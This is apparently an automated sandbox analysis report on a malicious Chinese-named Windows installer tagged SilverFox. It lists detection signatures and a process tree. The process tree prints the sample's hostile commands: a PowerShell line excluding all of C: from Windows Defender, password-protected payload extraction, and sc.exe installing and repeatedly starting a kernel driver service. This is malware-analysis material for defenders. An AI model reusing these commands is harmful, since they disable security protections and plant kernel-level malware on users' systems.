Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.6.exe
renamed because original name is a hash value
Original sample name:_2.0.6.exe
Analysis ID:1579778
MD5:2fab10855efc0dc62a255ff1e6ec8fa6
SHA1:0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
SHA256:869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.6.exe (PID: 5596 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" MD5: 2FAB10855EFC0DC62A255FF1E6EC8FA6)
    • #U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PID: 2452 cmdline: "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 5972 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6980 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.6.exe (PID: 1644 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT MD5: 2FAB10855EFC0DC62A255FF1E6EC8FA6)
        • #U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PID: 5436 cmdline: "C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 6536 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6352 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5752 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2140 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6632 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5996 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6844 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2520 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6196 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5624 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3228 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6528 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6552 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5624 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5596 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1440 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6156 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ParentProcessId: 2452, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5972, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5752, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2140, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ParentProcessId: 2452, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5972, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5752, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2140, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ParentProcessId: 2452, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5972, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeVirustotal: Detection: 6%Perma Link
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2195342849.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2196177862.0000000001250000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0BAEC0 FindFirstFileA,FindClose,7_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00566868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00567496
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
